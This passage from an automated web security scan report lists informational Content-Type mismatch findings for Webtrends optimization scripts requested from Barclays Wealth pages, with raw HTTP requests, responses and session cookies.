b0a0e25895c8df49c4854bbb5c1435a5a6373611b67fd5ed4455456dfe5e061dc59eef4191141e0d0cebbbbb4cb781b92e7e8616fb483130032b2512378536e0c258ba2bc76a069b759c8c4ea58f9b5ac759a529801d7ba7eda93afe0ddabb50284d0f2dd2330e40235b893f0fdbdc19c91fed6c3b901ef11a4e147b7d807d2f22b5c5ed60ec2985a5eec30af349443453a8158905daaa4ab3ef284cba238d2b33eddc4838376817bec49561a8484b5e5486b69e61b6d77380006cb4f07b4abc0e97049d0da6d59f2b8d1abaf88ef36907fd525691579327f18efee02836a77f4df2e3be17598d3b2e778029bba743ee8ccd845ea6294f06e2decf38abc4ebd95b95c510c7161faabbad762f454429e9f43927ce5a51f3771c7da9144261adc801782c234a62e741a2649cf5409d6a5228dd012b0f5fb3ea5a14d8b11bfa76748fc9f8331643549233dc7357c4975f7e97c004bd9e5dcc60318d2b38ade449d6cd0bc0da163ca2e2c4297f6152d0aa548b27d987e3d839ab944c7f560e8e4b0e52bf46302a88e7cdea9f0e86a7b4c0a01e32ab8b90482efe55db125a2ff53fdd80c39a4807bd9d1e13e56e2da4058f0ffb9d7d0d21e8f86286b288f55fa6e898222c74dd91f19e8bb4e607fd2a4bc0e3c538383c327191ca03e7849185da7384812fda77ed78a439991ce205c96df42fd8c9cc937c5383f7250ca2061e1f47daf3fa197aa139df9f6e4efa9e59d75be2c49820728fa1f9c7ef5bb6cc9e0e218461a09d818da52d4bb27dcbf682b79452c84d2c97a61e3989ef5a27a040eceed8b1e79127130111b637e59e539ee9b1314215045bc86f7123a277006a15b4 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us/corporate-social-responsibility.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=27DB104FF240B21CA30EC91928AC60D3; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d042f457f; _wt.mode-79569=fcdcc722e93201f611e1; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a059683f7

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:05 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A41F4D7EB85977B26917F3C61E7ED309; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d030fc451; Expires=Sun, 01-Jan-2012 00:03:06 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=018ce995; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e932031ed775; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.73. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242f06ec4338f0c9609ed6286853138dbcf4b992a457f09522bedec119d956e043c6b5402b520bf74799c4cc7352300b03ec55280aee97c70eadf262fc27cbb7d1dc35c2e78397fd23e977853c5a3d30e2a3a2ed6b5bf1d1ebe14630a4b801ce334f0d6b7e654b582da1ce5b34bff1ee3a54c9f54797c5759ea6685618f272e01ec89ac279236b644448ae5e9470856b0eed63ab489a93ed746c3c0b9cccd150198cac82b4a05f4998f7dce37bbdf017ad4a4ee52a53e63863fca84f824e07d3d0be3ff88889026995f5e1087634ee46e4fedb02527ba58bd7f9d2ce466b0b7cbcf63ecba56f9f81b18b5d0859f49278b4c775444697be06e2b9b565cc04d93745fad54191ca808e5e5b2e7ef0a49077aaaaa8b448ea80ff467d08836009661c7768fadf41dd83148f0919ac17152cc65b25fba3f11362bd56a5f6d6930237f44a642d59f380be709504679151cbde6f81f414d5612b99bda4efab25f269df3baac129f6d64eaa245b933c89f2c31d2c578cbc2385011b00c499227f7f377b927155dce8337fa811f6c2d831fc7113df4c487a6028e45f7d275955a8488303624f90d82ded93fae2d188aa6373b0b6287708146a89a4553a79039e9a14baf71203aa0ec8b757b6c5a0d8a5a83c49b1cf7011aae39b6ca275b2ea43a6203cc1644f4870b6f1bbb3da0495f82d6f68b398a66d7eecc1eaff848e155512b5e2015ed12a39363d2f00cd9ba2bbb47eff6b092f2ac07d836d061d9b615f364ceb9bde36a355e9edd840e4c6b9eeaced8e6754b802c63938edb405b1310980e25fb3b0fc0ef19c5bc1d5aa1c06ffced00877b9c  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242f06ec4338f0c9609ed6286853138dbcf4b992a457f09522bedec119d956e043c6b5402b520bf74799c4cc7352300b03ec55280aee97c70eadf262fc27cbb7d1dc35c2e78397fd23e977853c5a3d30e2a3a2ed6b5bf1d1ebe14630a4b801ce334f0d6b7e654b582da1ce5b34bff1ee3a54c9f54797c5759ea6685618f272e01ec89ac279236b644448ae5e9470856b0eed63ab489a93ed746c3c0b9cccd150198cac82b4a05f4998f7dce37bbdf017ad4a4ee52a53e63863fca84f824e07d3d0be3ff88889026995f5e1087634ee46e4fedb02527ba58bd7f9d2ce466b0b7cbcf63ecba56f9f81b18b5d0859f49278b4c775444697be06e2b9b565cc04d93745fad54191ca808e5e5b2e7ef0a49077aaaaa8b448ea80ff467d08836009661c7768fadf41dd83148f0919ac17152cc65b25fba3f11362bd56a5f6d6930237f44a642d59f380be709504679151cbde6f81f414d5612b99bda4efab25f269df3baac129f6d64eaa245b933c89f2c31d2c578cbc2385011b00c499227f7f377b927155dce8337fa811f6c2d831fc7113df4c487a6028e45f7d275955a8488303624f90d82ded93fae2d188aa6373b0b6287708146a89a4553a79039e9a14baf71203aa0ec8b757b6c5a0d8a5a83c49b1cf7011aae39b6ca275b2ea43a6203cc1644f4870b6f1bbb3da0495f82d6f68b398a66d7eecc1eaff848e155512b5e2015ed12a39363d2f00cd9ba2bbb47eff6b092f2ac07d836d061d9b615f364ceb9bde36a355e9edd840e4c6b9eeaced8e6754b802c63938edb405b1310980e25fb3b0fc0ef19c5bc1d5aa1c06ffced00877b9c

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242f06ec4338f0c9609ed6286853138dbcf4b992a457f09522bedec119d956e043c6b5402b520bf74799c4cc7352300b03ec55280aee97c70eadf262fc27cbb7d1dc35c2e78397fd23e977853c5a3d30e2a3a2ed6b5bf1d1ebe14630a4b801ce334f0d6b7e654b582da1ce5b34bff1ee3a54c9f54797c5759ea6685618f272e01ec89ac279236b644448ae5e9470856b0eed63ab489a93ed746c3c0b9cccd150198cac82b4a05f4998f7dce37bbdf017ad4a4ee52a53e63863fca84f824e07d3d0be3ff88889026995f5e1087634ee46e4fedb02527ba58bd7f9d2ce466b0b7cbcf63ecba56f9f81b18b5d0859f49278b4c775444697be06e2b9b565cc04d93745fad54191ca808e5e5b2e7ef0a49077aaaaa8b448ea80ff467d08836009661c7768fadf41dd83148f0919ac17152cc65b25fba3f11362bd56a5f6d6930237f44a642d59f380be709504679151cbde6f81f414d5612b99bda4efab25f269df3baac129f6d64eaa245b933c89f2c31d2c578cbc2385011b00c499227f7f377b927155dce8337fa811f6c2d831fc7113df4c487a6028e45f7d275955a8488303624f90d82ded93fae2d188aa6373b0b6287708146a89a4553a79039e9a14baf71203aa0ec8b757b6c5a0d8a5a83c49b1cf7011aae39b6ca275b2ea43a6203cc1644f4870b6f1bbb3da0495f82d6f68b398a66d7eecc1eaff848e155512b5e2015ed12a39363d2f00cd9ba2bbb47eff6b092f2ac07d836d061d9b615f364ceb9bde36a355e9edd840e4c6b9eeaced8e6754b802c63938edb405b1310980e25fb3b0fc0ef19c5bc1d5aa1c06ffced00877b9c HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=83141D1BF679315B3A6FE0130C26720B; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e93200beff43; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00d8b959

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:04 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=2D0CE6DA7B82936A31CBC9ACE233AAA7; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.74. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242f06ec4338f0c9609ed6286853138dbcf4b992a457f09522bedec119d956e043c6b5402b520bf74799c4cc7352300b03ec55280aee97c70eadf262fc27cbb7d1dc35c2e78397fd23e977853c5a3d30e2a3a2ed6b5bf1d1ebe14630a4b801ce334f0d6b7e654b582da1ce5b34bff4fedf75c954072310e47bb718171cc3f6008bbb3a666ef26bc4658dabae0475615acfb8070f584d93ecd6e9fc7bedbdc1c12c3839d265f1df0cb8e31d62de3980d6fc3b5ec52a8247b8d3fcadff665f1773943fda08486923a9d1c5b14c46941ec600deca53c60e5548a7c9d4ce75bf3bfe7f64cdbe26692916675d494d0c21072c9133d4a407a24bb7c26880f0a981ff62c1d8577075faf26f1e0ade3e25b044f29f7e8d35addf752a63b80822f0e896d8f67ccf9e456e61238d3b7b4f14177ed5ac04ae72e54672a802b5d313e24752101fa43dec67703b2571c112c4918e5a6b44e0318425bb7839b04a79f146fcc93c99059bf7a5ecb80619f01fea63f29e6b344acbf093410c24a049160b3a119b5364c4ff4c768b8dd0d676e841291103df9c684b20c8251f1a1648c56f6f1476f76864a83c1da3f9f3800b689474f7642b056b057dbcb6e6da68d37d7eb05f930517bfeb2d66f747d58038d4c84c29e1cf40c0da735b5d723462fa33f6b18d80c01b3d04a1849fa67f1535d968cb5dc708a15aac4e706b9b713e15e5d285e2014f212a89767d4fe06cfb32ea85cf890d6dfbef74acb3fc367cea30e94038de3e1aa79384996ca8d054b729af1dbc2811c10c56f309fc18d1c165153941337825e63b7886fdebf070bf3c03ea3cf931cd2948b5ec79e42a1461446d88c1c2e1ff926d5e648555470eb34605189cba34d9a181e0d48ace7ef0afc9aad3417df53fb0c6c20056b7158709123e0a70dab3c9d340cd934928602a0d59a59c912e17ce64d7385ffef35bf75d7fd346c1f4c2da44855532b188f6307dbd919984cba3d3b971aa64a1c127b788d732876b4cbbd60eb28d4f6ba9603a31a456007f91b8f028dfc40e9ba794cef21882b3eb4d61e60643b4bea91c33aa91d4e580d80e69530bed07dd40569e7f92e4eee0f990ec55cacd5cf278c1ae9ab88f56354f950069a039579aaddfcec2b65a02d43a2b6bd1e098c692f758628befd10bbdc96885daa234f53e588c036f1cbba8e5b95961a90114cfaeaad2d7e46127fb4a96e22ce5a05f2741679ac444364f6ca562a3c6b5809a253b832c4fd16c3276951b57e4e7a44a4bc522fcbac78d5716cd8eaf820201a06db34ab081bdc8f1b78ca9a56e9995dcc3c648c793effe44bd6995bdbcf0206e5af8b6f683146c8ad5b8e278391efcc39aa9f482905058c1e5a01ef47377bd6efcae4c705d7fcb7c0a81067ab8dc3477eaf5b84175e25f26e8e83c3994e57e8981019e56e79f150db5afbcf7f5922bcf832d3e2daf701a0ea937d2e248995f29e8ce7bb57f97748c2b6943e36683773909253b2d797d2db27de8028d825ef24a33a9c15e306ce3eff2cd0c9c9c17a5283a42701a007474e46d8a3f14921a63bd99b324cfac806865fe2c48c3d64e9b0eb8bb307e59fd75d2a8763fadede9ca07b1de9269fa780b69b58c3447992fa4e6c86bc4c6de7228088ffd2c0d624540c42a27ef980006ee1c2  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242f06ec4338f0c9609ed6286853138dbcf4b992a457f09522bedec119d956e043c6b5402b520bf74799c4cc7352300b03ec55280aee97c70eadf262fc27cbb7d1dc35c2e78397fd23e977853c5a3d30e2a3a2ed6b5bf1d1ebe14630a4b801ce334f0d6b7e654b582da1ce5b34bff4fedf75c954072310e47bb718171cc3f6008bbb3a666ef26bc4658dabae0475615acfb8070f584d93ecd6e9fc7bedbdc1c12c3839d265f1df0cb8e31d62de3980d6fc3b5ec52a8247b8d3fcadff665f1773943fda08486923a9d1c5b14c46941ec600deca53c60e5548a7c9d4ce75bf3bfe7f64cdbe26692916675d494d0c21072c9133d4a407a24bb7c26880f0a981ff62c1d8577075faf26f1e0ade3e25b044f29f7e8d35addf752a63b80822f0e896d8f67ccf9e456e61238d3b7b4f14177ed5ac04ae72e54672a802b5d313e24752101fa43dec67703b2571c112c4918e5a6b44e0318425bb7839b04a79f146fcc93c99059bf7a5ecb80619f01fea63f29e6b344acbf093410c24a049160b3a119b5364c4ff4c768b8dd0d676e841291103df9c684b20c8251f1a1648c56f6f1476f76864a83c1da3f9f3800b689474f7642b056b057dbcb6e6da68d37d7eb05f930517bfeb2d66f747d58038d4c84c29e1cf40c0da735b5d723462fa33f6b18d80c01b3d04a1849fa67f1535d968cb5dc708a15aac4e706b9b713e15e5d285e2014f212a89767d4fe06cfb32ea85cf890d6dfbef74acb3fc367cea30e94038de3e1aa79384996ca8d054b729af1dbc2811c10c56f309fc18d1c165153941337825e63b7886fdebf070bf3c03ea3cf931cd2948b5ec79e42a1461446d88c1c2e1ff926d5e648555470eb34605189cba34d9a181e0d48ace7ef0afc9aad3417df53fb0c6c20056b7158709123e0a70dab3c9d340cd934928602a0d59a59c912e17ce64d7385ffef35bf75d7fd346c1f4c2da44855532b188f6307dbd919984cba3d3b971aa64a1c127b788d732876b4cbbd60eb28d4f6ba9603a31a456007f91b8f028dfc40e9ba794cef21882b3eb4d61e60643b4bea91c33aa91d4e580d80e69530bed07dd40569e7f92e4eee0f990ec55cacd5cf278c1ae9ab88f56354f950069a039579aaddfcec2b65a02d43a2b6bd1e098c692f758628befd10bbdc96885daa234f53e588c036f1cbba8e5b95961a90114cfaeaad2d7e46127fb4a96e22ce5a05f2741679ac444364f6ca562a3c6b5809a253b832c4fd16c3276951b57e4e7a44a4bc522fcbac78d5716cd8eaf820201a06db34ab081bdc8f1b78ca9a56e9995dcc3c648c793effe44bd6995bdbcf0206e5af8b6f683146c8ad5b8e278391efcc39aa9f482905058c1e5a01ef47377bd6efcae4c705d7fcb7c0a81067ab8dc3477eaf5b84175e25f26e8e83c3994e57e8981019e56e79f150db5afbcf7f5922bcf832d3e2daf701a0ea937d2e248995f29e8ce7bb57f97748c2b6943e36683773909253b2d797d2db27de8028d825ef24a33a9c15e306ce3eff2cd0c9c9c17a5283a42701a007474e46d8a3f14921a63bd99b324cfac806865fe2c48c3d64e9b0eb8bb307e59fd75d2a8763fadede9ca07b1de9269fa780b69b58c3447992fa4e6c86bc4c6de7228088ffd2c0d624540c42a27ef980006ee1c2

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242f06ec4338f0c9609ed6286853138dbcf4b992a457f09522bedec119d956e043c6b5402b520bf74799c4cc7352300b03ec55280aee97c70eadf262fc27cbb7d1dc35c2e78397fd23e977853c5a3d30e2a3a2ed6b5bf1d1ebe14630a4b801ce334f0d6b7e654b582da1ce5b34bff4fedf75c954072310e47bb718171cc3f6008bbb3a666ef26bc4658dabae0475615acfb8070f584d93ecd6e9fc7bedbdc1c12c3839d265f1df0cb8e31d62de3980d6fc3b5ec52a8247b8d3fcadff665f1773943fda08486923a9d1c5b14c46941ec600deca53c60e5548a7c9d4ce75bf3bfe7f64cdbe26692916675d494d0c21072c9133d4a407a24bb7c26880f0a981ff62c1d8577075faf26f1e0ade3e25b044f29f7e8d35addf752a63b80822f0e896d8f67ccf9e456e61238d3b7b4f14177ed5ac04ae72e54672a802b5d313e24752101fa43dec67703b2571c112c4918e5a6b44e0318425bb7839b04a79f146fcc93c99059bf7a5ecb80619f01fea63f29e6b344acbf093410c24a049160b3a119b5364c4ff4c768b8dd0d676e841291103df9c684b20c8251f1a1648c56f6f1476f76864a83c1da3f9f3800b689474f7642b056b057dbcb6e6da68d37d7eb05f930517bfeb2d66f747d58038d4c84c29e1cf40c0da735b5d723462fa33f6b18d80c01b3d04a1849fa67f1535d968cb5dc708a15aac4e706b9b713e15e5d285e2014f212a89767d4fe06cfb32ea85cf890d6dfbef74acb3fc367cea30e94038de3e1aa79384996ca8d054b729af1dbc2811c10c56f309fc18d1c165153941337825e63b7886fdebf070bf3c03ea3cf931cd2948b5ec79e42a1461446d88c1c2e1ff926d5e648555470eb34605189cba34d9a181e0d48ace7ef0afc9aad3417df53fb0c6c20056b7158709123e0a70dab3c9d340cd934928602a0d59a59c912e17ce64d7385ffef35bf75d7fd346c1f4c2da44855532b188f6307dbd919984cba3d3b971aa64a1c127b788d732876b4cbbd60eb28d4f6ba9603a31a456007f91b8f028dfc40e9ba794cef21882b3eb4d61e60643b4bea91c33aa91d4e580d80e69530bed07dd40569e7f92e4eee0f990ec55cacd5cf278c1ae9ab88f56354f950069a039579aaddfcec2b65a02d43a2b6bd1e098c692f758628befd10bbdc96885daa234f53e588c036f1cbba8e5b95961a90114cfaeaad2d7e46127fb4a96e22ce5a05f2741679ac444364f6ca562a3c6b5809a253b832c4fd16c3276951b57e4e7a44a4bc522fcbac78d5716cd8eaf820201a06db34ab081bdc8f1b78ca9a56e9995dcc3c648c793effe44bd6995bdbcf0206e5af8b6f683146c8ad5b8e278391efcc39aa9f482905058c1e5a01ef47377bd6efcae4c705d7fcb7c0a81067ab8dc3477eaf5b84175e25f26e8e83c3994e57e8981019e56e79f150db5afbcf7f5922bcf832d3e2daf701a0ea937d2e248995f29e8ce7bb57f97748c2b6943e36683773909253b2d797d2db27de8028d825ef24a33a9c15e306ce3eff2cd0c9c9c17a5283a42701a007474e46d8a3f14921a63bd99b324cfac806865fe2c48c3d64e9b0eb8bb307e59fd75d2a8763fadede9ca07b1de9269fa780b69b58c3447992fa4e6c86bc4c6de7228088ffd2c0d624540c42a27ef980006ee1c2 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking/products-services/investment-management.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D04074B23F5A36B7B29BA0731F53ABEE; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a059683f7; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d030fc451; _wt.mode-79569=fcdcc722e932031ed775

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:13 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=6FBCA80F75E0528A929525FF0B85D1D0; Path=/ots
Set-Cookie: _wt.mode-79569=e1f36dbd085f0041d284; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a04d7d1af; Expires=Sun, 01-Jan-2012 00:03:13 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.75. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f6866c92a8364fce80a4ac8ec97ff3af0ab1a91f759648ddbe8945b1fbc2a0c691c542d898873efe10f7b76c498ddb47cc43ec556e608db660d2da235157b5b9128144e031cdcb7ce883bc49bd6f4730c072d8a321c7d52ad125718084660403740fb6f080029b901e51b24a6221c496ceb95bab942b3a694ac765383e98e433393622f9d9f17e931a8eda17a812d683a6150e4b01c1e0f9ef4d85dc205723703dd0fc6f4124ba9072e2cc09f47b21bb5e672212e3bf7da7533d15f6a230f3710ab161f7f7a5b2a5a252d0a6ba81833bf9f72e776e1b061e383a6b4ac8ad21981ede323ce029e217dc6b4d3a767b82ede1afb1656cb9c46328b4e42351722cb1d0d00694805d504d7ee408963b59c5a0893a5345fde273fc33c0e2ae6543d340c434db5f5259b7c7a5f2ab848cc79dbebf67b9d533ae620852ed6c1d8920d6a293dfe8f9455e3509c5743fc507676071657ae654d7e8d39b07d29e1dc0de2e4372f95c7dc69176950b55e8a6452d713c02b77c0fd34c5119312dffa7d3723ea65f04253b14909bdfcd742cdedd8463497ed70186343273d6a7dc38dd0afe739fd0e2de4758ed2f619fcd61a33f241c15d3272636c5796d73761aa33cfc4bc40be761eaed05ab54419f5c774db5deebc8e4833933c2af78df019a9a326c24e6a99661a26fc6eeedb21a699fcab31cfc38689c60f666b098b2dd24a10e2b2801ea302c1b98bcfa9e50e84f373b269d6d2f7c1b4d28cd72ffdefaf3568c918f5240b9d3a75973ad955ba1cf4ce1a6687430fbfe8f238d3e1d50bb3de38e9966513f7b8d9814cea014bbe91045a7b3d6f41e0c0f30fcd6136d2216784d7da050198f0ca45cff981d25dcec38e29ec2ceabcdc69d0af985a319f277e893cdd705cc459b97a9f26f4f8c39db8a788cebbd56b8dbbb3be102559f17ed51fcf3971853502735446a1a8e4e673c9e1afef64e03a50b1c5ac11b9d02a126640e6e99925fd9c093efb0b093fed00776fae8b6a234b859eda6ebf7ead2a428a2aed140bda22bd319549c4fb4abd4520f933fd05556a3e6d6ba22da703548b4e7dae33bf5d75dda5069cc291a5d21f7457fb554ad2f7406babc64b17db2a18a0c2519aacfd9326004520a2af2e8bb3be2e167b47e96610a60345f48d763bbc0a7dc4f7a39b47c9801dffaadd31a10763ef4d4edbab6edde4160908762feaf55d3b14e034a5c8f914aa5d955986e97282a3fa74e19cfc572e502f6bdf268576d8cef039bd66133d42aac8dd6f6058e280d61404400220b20e735a9a73667798fda7d646935c4d8acb985ea69f8b3f1a7d923def6aba934941b3dda9836064000a5977ed64124fb6efac5661506723c893c81099fd42d42a3267cb2bf376fb91ab003a639be54757e1a4521a98a0cc1919024fe93c16cc95d1cc3761f72590a6a2a2ee078c6e44d87f93480221b85202df07007d97d8a356e3f8fb1962e543a9f04feb0616791ad0125373ad059162a71bbf171f1b26df160876eaf9338caf44f170855d2286eedea1c59d22676858ef53fd11c1ab5a04c6265b369b6fcab8dbf743de1ab8aafaa608973f2f35bfdd8625668ef2bf523b1d91bcd7fbf58e05b67c28d8c4e00a0cbe7a0392ce7e474bc1b86b63b253cbbf302542253da8424ddf9440265015aff36dad47ae90fa3000df4d6  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/f6866c92a8364fce80a4ac8ec97ff3af0ab1a91f759648ddbe8945b1fbc2a0c691c542d898873efe10f7b76c498ddb47cc43ec556e608db660d2da235157b5b9128144e031cdcb7ce883bc49bd6f4730c072d8a321c7d52ad125718084660403740fb6f080029b901e51b24a6221c496ceb95bab942b3a694ac765383e98e433393622f9d9f17e931a8eda17a812d683a6150e4b01c1e0f9ef4d85dc205723703dd0fc6f4124ba9072e2cc09f47b21bb5e672212e3bf7da7533d15f6a230f3710ab161f7f7a5b2a5a252d0a6ba81833bf9f72e776e1b061e383a6b4ac8ad21981ede323ce029e217dc6b4d3a767b82ede1afb1656cb9c46328b4e42351722cb1d0d00694805d504d7ee408963b59c5a0893a5345fde273fc33c0e2ae6543d340c434db5f5259b7c7a5f2ab848cc79dbebf67b9d533ae620852ed6c1d8920d6a293dfe8f9455e3509c5743fc507676071657ae654d7e8d39b07d29e1dc0de2e4372f95c7dc69176950b55e8a6452d713c02b77c0fd34c5119312dffa7d3723ea65f04253b14909bdfcd742cdedd8463497ed70186343273d6a7dc38dd0afe739fd0e2de4758ed2f619fcd61a33f241c15d3272636c5796d73761aa33cfc4bc40be761eaed05ab54419f5c774db5deebc8e4833933c2af78df019a9a326c24e6a99661a26fc6eeedb21a699fcab31cfc38689c60f666b098b2dd24a10e2b2801ea302c1b98bcfa9e50e84f373b269d6d2f7c1b4d28cd72ffdefaf3568c918f5240b9d3a75973ad955ba1cf4ce1a6687430fbfe8f238d3e1d50bb3de38e9966513f7b8d9814cea014bbe91045a7b3d6f41e0c0f30fcd6136d2216784d7da050198f0ca45cff981d25dcec38e29ec2ceabcdc69d0af985a